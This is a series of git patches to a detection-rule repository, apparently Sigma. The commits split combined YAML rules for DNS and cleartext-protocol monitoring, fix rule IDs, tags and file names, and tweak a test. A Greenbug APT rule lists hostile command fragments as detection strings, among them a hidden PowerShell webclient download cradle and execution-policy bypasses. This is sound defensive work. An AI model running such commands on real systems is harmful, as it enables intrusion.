insertions(+), 16 deletions(-) create mode 100644 rules/network/net_firewall_high_dns_requests_rate.yml diff --git a/rules/network/net_firewall_high_dns_requests_rate.yml b/rules/network/net_firewall_high_dns_requests_rate.yml new file mode 100644 index 00000000..843c080a --- /dev/null +++ b/rules/network/net_firewall_high_dns_requests_rate.yml @@ -0,0 +1,24 @@ +title: High DNS Requests Rate +id: 51186749-7415-46be-90e5-6914865c825a +status: experimental +description: High DNS requests amount from host per short period of time +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048 # an old one + - attack.t1048.003 + - attack.command_and_control + - attack.t1071 # an old one + - attack.t1071.004 +logsource: + category: firewall +detection: + selection: + dst_port: 53 + timeframe: 1m + condition: selection | count() by src_ip > 1000 +falsepositives: + - Legitimate high DNS requests rate to domain name which should be added to whitelist +level: medium \ No newline at end of file diff --git a/rules/network/net_high_dns_requests_rate.yml b/rules/network/net_high_dns_requests_rate.yml index c870aacf..da872771 100644 --- a/rules/network/net_high_dns_requests_rate.yml +++ b/rules/network/net_high_dns_requests_rate.yml @@ -1,13 +1,10 @@ -action: global title: High DNS Requests Rate +id: b4163085-4001-46a3-a79a-55d8bbbc7a3a status: experimental description: High DNS requests amount from host per short period of time author: Daniil Yugoslavskiy, oscd.community date: 2019/10/24 -modified: 2020/08/27 -falsepositives: - - Legitimate high DNS requests rate to domain name which should be added to whitelist -level: medium +modified: 2021/09/21 tags: - attack.exfiltration - attack.t1048 # an old one @@ -15,8 +12,6 @@ tags: - attack.command_and_control - attack.t1071 # an old one - attack.t1071.004 ---- -id: b4163085-4001-46a3-a79a-55d8bbbc7a3a logsource: category: dns detection: @@ -24,12 +19,6 @@ detection: query: '*' timeframe: 1m condition: selection | count() by src_ip > 1000 ---- -id: 51186749-7415-46be-90e5-6914865c825a -logsource: - category: firewall -detection: - selection: - dst_port: 53 - timeframe: 1m - condition: selection | count() by src_ip > 1000 +falsepositives: + - Legitimate high DNS requests rate to domain name which should be added to whitelist +level: medium \ No newline at end of file From e377e4e96ff99d215c0be27b79212ef356d6d036 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:53:25 +0200 Subject: [PATCH 1037/1367] split global net_high_dns_bytes_out.yml --- .../net_firewall_high_dns_bytes_out.yml | 21 +++++++++++++++++++ rules/network/net_high_dns_bytes_out.yml | 21 +++++-------------- 2 files changed, 26 insertions(+), 16 deletions(-) create mode 100644 rules/network/net_firewall_high_dns_bytes_out.yml diff --git a/rules/network/net_firewall_high_dns_bytes_out.yml b/rules/network/net_firewall_high_dns_bytes_out.yml new file mode 100644 index 00000000..afe5e839 --- /dev/null +++ b/rules/network/net_firewall_high_dns_bytes_out.yml @@ -0,0 +1,21 @@ +title: High DNS Bytes Out +id: 3b6e327d-8649-4102-993f-d25786481589 +status: experimental +description: High DNS queries bytes amount from host per short period of time +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048 # an old one + - attack.t1048.003 +logsource: + category: firewall +detection: + selection: + dst_port: 53 + timeframe: 1m + condition: selection | sum(message_size) by src_ip > 300000 +falsepositives: + - Legitimate high DNS bytes out rate to domain name which should be added to whitelist +level: medium \ No newline at end of file diff --git a/rules/network/net_high_dns_bytes_out.yml b/rules/network/net_high_dns_bytes_out.yml index babf0d21..193bfcdf 100644 --- a/rules/network/net_high_dns_bytes_out.yml +++ b/rules/network/net_high_dns_bytes_out.yml @@ -1,19 +1,14 @@ -action: global title: High DNS Bytes Out +id: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd status: experimental description: High DNS queries bytes amount from host per short period of time author: Daniil Yugoslavskiy, oscd.community date: 2019/10/24 -modified: 2020/08/27 -falsepositives: - - Legitimate high DNS bytes out rate to domain name which should be added to whitelist -level: medium +modified: 2021/09/21 tags: - attack.exfiltration - attack.t1048 # an old one - attack.t1048.003 ---- -id: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd logsource: category: dns detection: @@ -21,12 +16,6 @@ detection: query: '*' timeframe: 1m condition: selection | sum(question_length) by src_ip > 300000 ---- -id: 3b6e327d-8649-4102-993f-d25786481589 -logsource: - category: firewall -detection: - selection: - dst_port: 53 - timeframe: 1m - condition: selection | sum(message_size) by src_ip > 300000 +falsepositives: + - Legitimate high DNS bytes out rate to domain name which should be added to whitelist +level: medium \ No newline at end of file From 7a52da3b4090efc48d8e9e89279e1f889ff28f2c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 19:56:47 +0200 Subject: [PATCH 1038/1367] split global cleartext_protocols.yml --- ...s.yml => firewall_cleartext_protocols.yml} | 34 +------- .../netflow_cleartext_protocols.yml | 79 +++++++++++++++++++ 2 files changed, 83 insertions(+), 30 deletions(-) rename rules/compliance/{cleartext_protocols.yml => firewall_cleartext_protocols.yml} (82%) create mode 100644 rules/compliance/netflow_cleartext_protocols.yml diff --git a/rules/compliance/cleartext_protocols.yml b/rules/compliance/firewall_cleartext_protocols.yml similarity index 82% rename from rules/compliance/cleartext_protocols.yml rename to rules/compliance/firewall_cleartext_protocols.yml index e50e0ea2..77b309b2 100644 --- a/rules/compliance/cleartext_protocols.yml +++ b/rules/compliance/firewall_cleartext_protocols.yml @@ -1,5 +1,5 @@ -action: global title: Cleartext Protocol Usage +id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e status: stable description: Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. @@ -9,9 +9,6 @@ references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf -falsepositives: - - unknown -level: low # tags: # - CSC4 # - CSC4.5 @@ -55,32 +52,6 @@ level: low # - PCI DSS 3.2 7.1 # - PCI DSS 3.2 7.2 # - PCI DSS 3.2 7.3 ---- -id: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f -logsource: - product: netflow -detection: - selection: - destination.port: - - 8080 - - 21 - - 80 - - 23 - - 50000 - - 1521 - - 27017 - - 1433 - - 11211 - - 3306 - - 15672 - - 5900 - - 5901 - - 5902 - - 5903 - - 5904 - condition: selection ---- -id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e logsource: category: firewall detection: @@ -108,3 +79,6 @@ detection: - accept - 2 condition: selection1 AND selection2 +falsepositives: + - unknown +level: low \ No newline at end of file diff --git a/rules/compliance/netflow_cleartext_protocols.yml b/rules/compliance/netflow_cleartext_protocols.yml new file mode 100644 index 00000000..455d225c --- /dev/null +++ b/rules/compliance/netflow_cleartext_protocols.yml @@ -0,0 +1,79 @@ +title: Cleartext Protocol Usage +id: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f +status: stable +description: Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption + is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. +author: Alexandr Yampolskyi, SOC Prime +date: 2019/03/26 +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf +# tags: + # - CSC4 + # - CSC4.5 + # - CSC14 + # - CSC14.4 + # - CSC16 + # - CSC16.5 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.DS-1 + # - NIST CSF 1.1 PR.DS-2 + # - ISO 27002-2013 A.9.2.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - ISO 27002-2013 A.8.3.1 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.10.1.1 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 + # - PCI DSS 3.2 8.8 + # - PCI DSS 3.2 1.3 + # - PCI DSS 3.2 1.4 + # - PCI DSS 3.2 4.3 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 +logsource: + product: netflow +detection: + selection: + destination.port: + - 8080 + - 21 + - 80 + - 23 + - 50000 + - 1521 + - 27017 + - 1433 + - 11211 + - 3306 + - 15672 + - 5900 + - 5901 + - 5902 + - 5903 + - 5904 + condition: selection +falsepositives: + - unknown +level: low \ No newline at end of file From 6e08ba55c4e75a9b0a90fc75136bae60a94a9771 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 20:16:26 +0200 Subject: [PATCH 1039/1367] fix error --- rules/compliance/firewall_cleartext_protocols.yml | 2 +- ...curity_metasploit_or_impacket_smb_psexec_service_install.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/compliance/firewall_cleartext_protocols.yml b/rules/compliance/firewall_cleartext_protocols.yml index 77b309b2..c4e9d253 100644 --- a/rules/compliance/firewall_cleartext_protocols.yml +++ b/rules/compliance/firewall_cleartext_protocols.yml @@ -78,7 +78,7 @@ detection: - forward - accept - 2 - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - unknown level: low \ No newline at end of file diff --git a/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml b/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml index 8ad72acf..e76b4c2e 100644 --- a/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/rules/windows/builtin/win_security_metasploit_or_impacket_smb_psexec_service_install.yml @@ -1,5 +1,5 @@ title: Metasploit Or Impacket Service Installation Via SMB PsExec -id: 6fb63b40-e02a-403e-9ffd-3bcc1d7494425 +id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442 related: - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 type: derived From db9e6124e3018b705339ec14b9a31baaa5918971 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 20:24:02 +0200 Subject: [PATCH 1040/1367] fix too many blank lines --- rules/windows/builtin/win_security_mal_creddumper.yml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/rules/windows/builtin/win_security_mal_creddumper.yml b/rules/windows/builtin/win_security_mal_creddumper.yml index d3053669..d6d823e6 100644 --- a/rules/windows/builtin/win_security_mal_creddumper.yml +++ b/rules/windows/builtin/win_security_mal_creddumper.yml @@ -38,7 +38,4 @@ detection: condition: selection falsepositives: - Legitimate Administrator using credential dumping tool for password recovery -level: high - - - +level: high \ No newline at end of file From e16e9e8ea7e275d0704b44533a97cdc59aa8d3c4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 22:54:45 +0200 Subject: [PATCH 1041/1367] fix timeframe compare error --- tests/test_rules.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index d4f2e0ef..b9dd2483 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -181,13 +181,17 @@ class TestRules(unittest.TestCase): return False for named_condition in detection1: + #don't check timeframes + if named_condition == "timeframe": + continue + # condition clause must be the same too if named_condition == "condition": if detection1["condition"] != detection2["condition"]: return False else: continue - + # Named condition must exist in both rule files if named_condition not in detection2: return False From 993bf465501ebea0fcd259074adb817a9c4d0c42 Mon Sep 17 00:00:00 2001 From: unknown Date: Tue, 21 Sep 2021 16:56:01 -0400 Subject: [PATCH 1042/1367] win-apt-greenbug-fix small change to B64encoded value of '/server=' in detection criteria --- rules/windows/process_creation/win_apt_greenbug_may20.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_apt_greenbug_may20.yml b/rules/windows/process_creation/win_apt_greenbug_may20.yml index ffae0327..6f1678a1 100644 --- a/rules/windows/process_creation/win_apt_greenbug_may20.yml +++ b/rules/windows/process_creation/win_apt_greenbug_may20.yml @@ -39,7 +39,7 @@ detection: - ' -nop -w hidden -c $m=new-object net.webclient;$m' - '-noninteractive -executionpolicy bypass whoami' - '-noninteractive -executionpolicy bypass netstat -a' - - 'L3NlcnZlc' # base64 encoded '/server=' + - 'L3NlcnZlcj0=' # base64 encoded '/server=' selection4: Image|endswith: - '\adobe\Adobe.exe' From 3ace73f9fd4226977c241470032e7fdd5e22842c Mon Sep 17 00:00:00 2001 From: unknown Date: Tue, 21 Sep 2021 16:59:32 -0400 Subject: [PATCH 1043/1367] win-apt-greenbug-fix - change modified date as well --- rules/windows/process_creation/win_apt_greenbug_may20.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_apt_greenbug_may20.yml b/rules/windows/process_creation/win_apt_greenbug_may20.yml index 6f1678a1..e3f03715 100644 --- a/rules/windows/process_creation/win_apt_greenbug_may20.yml +++ b/rules/windows/process_creation/win_apt_greenbug_may20.yml @@ -6,7 +6,7 @@ references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia author: Florian Roth date: 2020/05/20 -modified: 2020/08/27 +modified: 2021/09/21 tags: - attack.g0049 - attack.execution From 045e87058b00aecd534e76fa9e9b966eaa1b5182 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 22 Sep 2021 08:40:08 +0200 Subject: [PATCH 1044/1367] add definition --- .../powershell_memorydump_getstoragediagnosticinfo.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml index c31fc802..79ef1050 100644 --- a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml +++ b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml @@ -11,6 +11,7 @@ author: Max Altgelt logsource: product: windows service: powershell + definition: Script block logging must be enabled detection: dump: EventID: 4104 From b7b0bd427546816dcfd5f19b049030611d738a00 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 22 Sep 2021 09:46:05 +0200 Subject: [PATCH 1045/1367] Update lnx_clear_syslog.yml --- rules/linux/lnx_clear_syslog.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/linux/lnx_clear_syslog.yml b/rules/linux/lnx_clear_syslog.yml index 1c01a3a5..ac9fa13c 100644 --- a/rules/linux/lnx_clear_syslog.yml +++ b/rules/linux/lnx_clear_syslog.yml @@ -6,6 +6,9 @@ author: Max Altgelt date: 2021/09/10 references: - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 +tags: + - attack.impact + - attack.t1565.001 logsource: product: linux detection: @@ -23,5 +26,3 @@ detection: falsepositives: - Log rotation level: high -tags: - - attack.persistence From edb19013d518e74e9e665acee9643305abca58a5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 22 Sep 2021 16:11:29 +0200 Subject: [PATCH 1046/1367] fix test_file_names --- tests/test_rules.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index d4f2e0ef..ebdbfa27 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -522,7 +522,7 @@ class TestRules(unittest.TestCase): filename_pattern = re.compile('[a-z0-9_]{10,70}\.yml') for file in self.yield_next_rule_file_path(self.path_to_rules): filename = os.path.basename(file) - if not filename_pattern.match(filename) and not '_' in filename: + if filename_pattern.match(filename) == None or not '_' in filename: print(Fore.YELLOW + "Rule {} has a file name that doesn't match our standard.".format(file)) faulty_rules.append(file) From 3c906b52a022354cbc2104103e8893c8e84819c6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 22 Sep 2021 16:21:07 +0200 Subject: [PATCH 1047/1367] fix filename --- ...mation.yml => gcp_dlp_re_identifies_sensitive_information.yml} | 0 ...ml => okta_application_sign_on_policy_modified_or_deleted.yml} | 0 ...r_enumeration.yml => zeek_dce_rpc_domain_user_enumeration.yml} | 0 ...cure_cve-2019-11510.yml => web_pulsesecure_cve_2019_11510.yml} | 0 ...lip+_services.yml => win_invoke_obfuscation_clip_services.yml} | 0 ...rity.yml => win_invoke_obfuscation_clip_services_security.yml} | 0 ..._var+_services.yml => win_invoke_obfuscation_var_services.yml} | 0 ...urity.yml => win_invoke_obfuscation_var_services_security.yml} | 0 ...+_services.yml => win_invoke_obfuscation_via_var_services.yml} | 0 ...y.yml => win_invoke_obfuscation_via_var_services_security.yml} | 0 ...event_winrm_AWL_bypass.yml => file_event_winrm_awl_bypass.yml} | 0 ...fuscation_clip+.yml => powershell_invoke_obfuscation_clip.yml} | 0 ...obfuscation_var+.yml => powershell_invoke_obfuscation_var.yml} | 0 ...on_via_var++.yml => powershell_invoke_obfuscation_via_var.yml} | 0 ...invoke_obfuscation_var+.yml => win_invoke_obfuscation_var.yml} | 0 ...fuscation_via_var++.yml => win_invoke_obfuscation_via_var.yml} | 0 ...in_susp_winrm_AWL_bypass.yml => win_susp_winrm_awl_bypass.yml} | 0 17 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/gcp/{gcp_dlp_re-identifies_sensitive_information.yml => gcp_dlp_re_identifies_sensitive_information.yml} (100%) rename rules/cloud/okta/{okta_application_sign-on_policy_modified_or_deleted.yml => okta_application_sign_on_policy_modified_or_deleted.yml} (100%) rename rules/network/zeek/{zeek-dce_rpc_domain_user_enumeration.yml => zeek_dce_rpc_domain_user_enumeration.yml} (100%) rename rules/web/{web_pulsesecure_cve-2019-11510.yml => web_pulsesecure_cve_2019_11510.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_clip+_services.yml => win_invoke_obfuscation_clip_services.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_clip+_services_security.yml => win_invoke_obfuscation_clip_services_security.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_var+_services.yml => win_invoke_obfuscation_var_services.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_var+_services_security.yml => win_invoke_obfuscation_var_services_security.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_via_var++_services.yml => win_invoke_obfuscation_via_var_services.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_via_var++_services_security.yml => win_invoke_obfuscation_via_var_services_security.yml} (100%) rename rules/windows/file_event/{file_event_winrm_AWL_bypass.yml => file_event_winrm_awl_bypass.yml} (100%) rename rules/windows/powershell/{powershell_invoke_obfuscation_clip+.yml => powershell_invoke_obfuscation_clip.yml} (100%) rename rules/windows/powershell/{powershell_invoke_obfuscation_var+.yml => powershell_invoke_obfuscation_var.yml} (100%) rename rules/windows/powershell/{powershell_invoke_obfuscation_via_var++.yml => powershell_invoke_obfuscation_via_var.yml} (100%) rename rules/windows/process_creation/{win_invoke_obfuscation_var+.yml => win_invoke_obfuscation_var.yml} (100%) rename rules/windows/process_creation/{win_invoke_obfuscation_via_var++.yml => win_invoke_obfuscation_via_var.yml} (100%) rename rules/windows/process_creation/{win_susp_winrm_AWL_bypass.yml => win_susp_winrm_awl_bypass.yml} (100%) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml similarity index 100% rename from rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml rename to rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml similarity index 100% rename from rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml rename to rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml diff --git a/rules/network/zeek/zeek-dce_rpc_domain_user_enumeration.yml b/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml similarity index 100% rename from rules/network/zeek/zeek-dce_rpc_domain_user_enumeration.yml rename to rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml diff --git a/rules/web/web_pulsesecure_cve-2019-11510.yml b/rules/web/web_pulsesecure_cve_2019_11510.yml similarity index 100% rename from rules/web/web_pulsesecure_cve-2019-11510.yml rename to rules/web/web_pulsesecure_cve_2019_11510.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_clip_services.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml rename to rules/windows/builtin/win_invoke_obfuscation_clip_services.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_clip_services_security.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml rename to rules/windows/builtin/win_invoke_obfuscation_clip_services_security.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_var_services.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_var+_services.yml rename to rules/windows/builtin/win_invoke_obfuscation_var_services.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_var_services_security.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml rename to rules/windows/builtin/win_invoke_obfuscation_var_services_security.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var_services.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml rename to rules/windows/builtin/win_invoke_obfuscation_via_var_services.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var_services_security.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml rename to rules/windows/builtin/win_invoke_obfuscation_via_var_services_security.yml diff --git a/rules/windows/file_event/file_event_winrm_AWL_bypass.yml b/rules/windows/file_event/file_event_winrm_awl_bypass.yml similarity index 100% rename from rules/windows/file_event/file_event_winrm_AWL_bypass.yml rename to rules/windows/file_event/file_event_winrm_awl_bypass.yml diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_clip.yml similarity index 100% rename from rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml rename to rules/windows/powershell/powershell_invoke_obfuscation_clip.yml diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_var.yml similarity index 100% rename from rules/windows/powershell/powershell_invoke_obfuscation_var+.yml rename to rules/windows/powershell/powershell_invoke_obfuscation_var.yml diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml similarity index 100% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml rename to rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml diff --git a/rules/windows/process_creation/win_invoke_obfuscation_var+.yml b/rules/windows/process_creation/win_invoke_obfuscation_var.yml similarity index 100% rename from rules/windows/process_creation/win_invoke_obfuscation_var+.yml rename to rules/windows/process_creation/win_invoke_obfuscation_var.yml diff --git a/rules/windows/process_creation/win_invoke_obfuscation_via_var++.yml b/rules/windows/process_creation/win_invoke_obfuscation_via_var.yml similarity index 100% rename from rules/windows/process_creation/win_invoke_obfuscation_via_var++.yml rename to rules/windows/process_creation/win_invoke_obfuscation_via_var.yml diff --git a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml b/rules/windows/process_creation/win_susp_winrm_awl_bypass.yml similarity index 100% rename from rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml rename to rules/windows/process_creation/win_susp_winrm_awl_bypass.yml From ab5f5f95bc1a7348184afc233ae8909e01487eb4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 22 Sep 2021 16:27:05 +0200 Subject: [PATCH 1048/1367] fix filename --- ...les_creation_by_office_applications_using_file_extentions.yml} | 0 ...e_applications_from_proxy_executing_regsvr32_with_payload.yml} | 0 ...ess_creation_office_applications_spawning_wmi_commandline.yml} | 0 .../{win_manage-bde_lolbas.yml => win_manage_bde_lolbas.yml} | 0 .../{win_susp_vboxdrvInst.yml => win_susp_vboxdrvinst.yml} | 0 .../{sysmon_cve-2020-1048.yml => sysmon_cve_2020_1048.yml} | 0 6 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/{sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml => file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml} (100%) rename rules/windows/{sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml => process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml} (100%) rename rules/windows/{sysmon/Office_Applications_Spawning_WMI_command-line.yml => process_creation/process_creation_office_applications_spawning_wmi_commandline.yml} (100%) rename rules/windows/process_creation/{win_manage-bde_lolbas.yml => win_manage_bde_lolbas.yml} (100%) rename rules/windows/process_creation/{win_susp_vboxdrvInst.yml => win_susp_vboxdrvinst.yml} (100%) rename rules/windows/registry_event/{sysmon_cve-2020-1048.yml => sysmon_cve_2020_1048.yml} (100%) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml similarity index 100% rename from rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml rename to rules/windows/file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml similarity index 100% rename from rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml rename to rules/windows/process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/process_creation_office_applications_spawning_wmi_commandline.yml similarity index 100% rename from rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml rename to rules/windows/process_creation/process_creation_office_applications_spawning_wmi_commandline.yml diff --git a/rules/windows/process_creation/win_manage-bde_lolbas.yml b/rules/windows/process_creation/win_manage_bde_lolbas.yml similarity index 100% rename from rules/windows/process_creation/win_manage-bde_lolbas.yml rename to rules/windows/process_creation/win_manage_bde_lolbas.yml diff --git a/rules/windows/process_creation/win_susp_vboxdrvInst.yml b/rules/windows/process_creation/win_susp_vboxdrvinst.yml similarity index 100% rename from rules/windows/process_creation/win_susp_vboxdrvInst.yml rename to rules/windows/process_creation/win_susp_vboxdrvinst.yml diff --git a/rules/windows/registry_event/sysmon_cve-2020-1048.yml b/rules/windows/registry_event/sysmon_cve_2020_1048.yml similarity index 100% rename from rules/windows/registry_event/sysmon_cve-2020-1048.yml rename to rules/windows/registry_event/sysmon_cve_2020_1048.yml From 9924cc39468589ffd26d1a788bea28f39229154c Mon Sep 17 00:00:00 2001 From: unknown Date: Wed, 22 Sep 2021 10:33:04 -0400 Subject: [PATCH 1049/1367] win-apt-greenbug-fix amend b64 value of /server= as seen in IOC --- rules/windows/process_creation/win_apt_greenbug_may20.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_apt_greenbug_may20.yml b/rules/windows/process_creation/win_apt_greenbug_may20.yml index e3f03715..443beebb 100644 --- a/rules/windows/process_creation/win_apt_greenbug_may20.yml +++ b/rules/windows/process_creation/win_apt_greenbug_may20.yml @@ -39,7 +39,7 @@ detection: - ' -nop -w hidden -c $m=new-object net.webclient;$m' - '-noninteractive -executionpolicy bypass whoami' - '-noninteractive -executionpolicy bypass netstat -a' - - 'L3NlcnZlcj0=' # base64 encoded '/server=' + - 'L3NlcnZlcj1' # base64 encoded '/server=' selection4: Image|endswith: - '\adobe\Adobe.exe' From 6e6d57b019283eabcfe5b69b758a1b5d5618bdf8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 22 Sep 2021 18:45:08 +0200 Subject: [PATCH 1050/1367] fix filename --- ...ty.yml => win_exploit_cve_2021_1675_printspooler_security.yml} | 0 .../{win_GPO_scheduledtasks.yml => win_gpo_scheduledtasks.yml} | 0 ...in+_services.yml => win_invoke_obfuscation_stdin_services.yml} | 0 ...ity.yml => win_invoke_obfuscation_stdin_services_security.yml} | 0 ...tial_cve-2019-0708.yml => win_rdp_potential_cve_2019_0708.yml} | 0 ...ml => file_event_script_creation_by_office_using_file_ext.yml} | 0 ...ortAgent_failed.yml => 